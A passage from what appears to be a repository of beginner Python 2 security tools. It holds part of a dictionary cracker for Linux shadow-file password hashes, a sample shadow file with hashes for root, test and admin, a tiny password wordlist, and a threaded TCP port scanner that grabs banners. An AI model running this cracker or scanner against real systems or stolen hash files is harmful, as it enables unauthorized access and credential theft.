@dict_file: password dictionary 27 | """ 28 | with open(dict_file) as d_fp: 29 | dict_list = d_fp.readlines() 30 | 31 | with open(passwd_file) as fp: 32 | for line in fp.readlines(): 33 | if not line.startswith('#') and ':' in line: 34 | user = line.split(':')[0] 35 | crypt_passwd = line.split(':')[1].strip() 36 | if not crypt_passwd.startswith('$'): 37 | print '[*] Password Format Bad!' 38 | continue 39 | print '[*] Cracking Password For: %s' % user 40 | test_pass(crypt_passwd.strip(), dict_list) 41 | 42 | 43 | if __name__ == '__main__': 44 | platform = sys.platform 45 | if not platform.startswith('linux'): 46 | print 'Need linux system run.' 47 | exit(0) 48 | if len(sys.argv) != 3: 49 | print 'Usage: %s ' % sys.argv[0] 50 | exit(0) 51 | if not os.path.isfile(sys.argv[1]): 52 | print '"%s" file does not exist!!!' % sys.argv[1] 53 | exit(0) 54 | if not os.path.isfile(sys.argv[2]): 55 | print '"%s" file does not exist!!!' % sys.argv[2] 56 | exit(0) 57 | main(sys.argv[1], sys.argv[2]) 58 | -------------------------------------------------------------------------------- /cracklinux/crack_user.txt: -------------------------------------------------------------------------------- 1 | root:$6$m/oe0dps$RiGwPuaScMtey87dwmgbf7RsIC.fJLaqN5z3H.ihVzg9PHi.AEOoj1NTEhNBJ6KEyvpBAusbTiFWYNSvXqdiD0:16919:0:99999:7::: 2 | test:$6$hecofBdK$ncce1KQvGdgpgyqcKj.Ky9q6YLmqdLjRt3dT/QbvNnZja1LFhDzMWiEBye8gYR/x/dS.rEm1PSybhXtoRUPtz/:16918:0:99999:7::: 3 | admin:$6$TrEOZ/iZ$kkhh/KQyyc4KTwUfzEdVjy5OcDojtTbiSD.G/hHPXcDDP7R0bqofq8VnVdKVN3dkHKhW9X6FwtVLId8vIFwuH/:16919:0:99999:7::: 4 | -------------------------------------------------------------------------------- /cracklinux/dict.txt: -------------------------------------------------------------------------------- 1 | test123 2 | password 3 | admin123456 4 | 1qaz@WSX 5 | 1234567890 6 | 7 | -------------------------------------------------------------------------------- /port_scan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding: utf-8 3 | 4 | import optparse 5 | import socket 6 | 7 | from threading import Thread 8 | from threading import Semaphore 9 | from socket import gethostbyname 10 | from socket import gethostbyaddr 11 | from socket import setdefaulttimeout 12 | 13 | lock = Semaphore(value=1) 14 | 15 | 16 | def conn_scan(host, port): 17 | try: 18 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 19 | sock.connect((host, port)) 20 | sock.send('Hello\r\n') 21 | results = sock.recv(100) 22 | lock.acquire() 23 | print '[+]%d/tcp open' % port 24 | print '[+]%s' % results.splitlines()[0] if results else '' 25 | except Exception as e: 26 | lock.acquire() 27 | print '[-]%d/tcp closed' % port 28 | finally: 29 | lock.release() 30 | if sock: 31 | sock.close() 32 | 33 | 34 | def port_scan(host, ports, timeout): 35 | port_list = sorted([int(port) for port in set(ports.split(','))]) 36 | try: 37 | ip = gethostbyname(host) 38 | except: 39 | print '[-] Cannot resolve "%s": Unknown host' % host 40 | return 41 | 42 | try: 43 | name = gethostbyaddr(ip) 44 | print '[+] Scan Results for: %s' % name[0] 45 | except: 46 | print '[+] Scan Results for: %s' % ip 47 | 48 | setdefaulttimeout(timeout) 49 | for target_port in port_list: 50 | t = Thread(target=conn_scan, args=(host, target_port)) 51 | t.start() 52 | 53 | 54 | def main(): 55 | parser = optparse.OptionParser(usage='Usage: %prog -H -P \n ' \ 56 | '\n example: %prog -H www.example.com -P 80,81,21,22', ) 57 | parser.add_option('-H', dest='target_host', help='show target IP.') 58 | parser.add_option('-P', dest='target_port', help='show target port(s).') 59 | parser.add_option('-t', dest='timeout', default=30, type=int, help='socket connect time out.') 60 | config, args = parser.parse_args() 61 | if not any((config.target_host, config.target_port)): 62 | print '[-] You must specify a target host and port[s].' 63 | exit(0) 64 | port_scan(config.target_host, config.target_port, timeout=config.timeout) 65 | 66 | 67 | if __name__ == '__main__': 68 | main() 69 | --------------------------------------------------------------------------------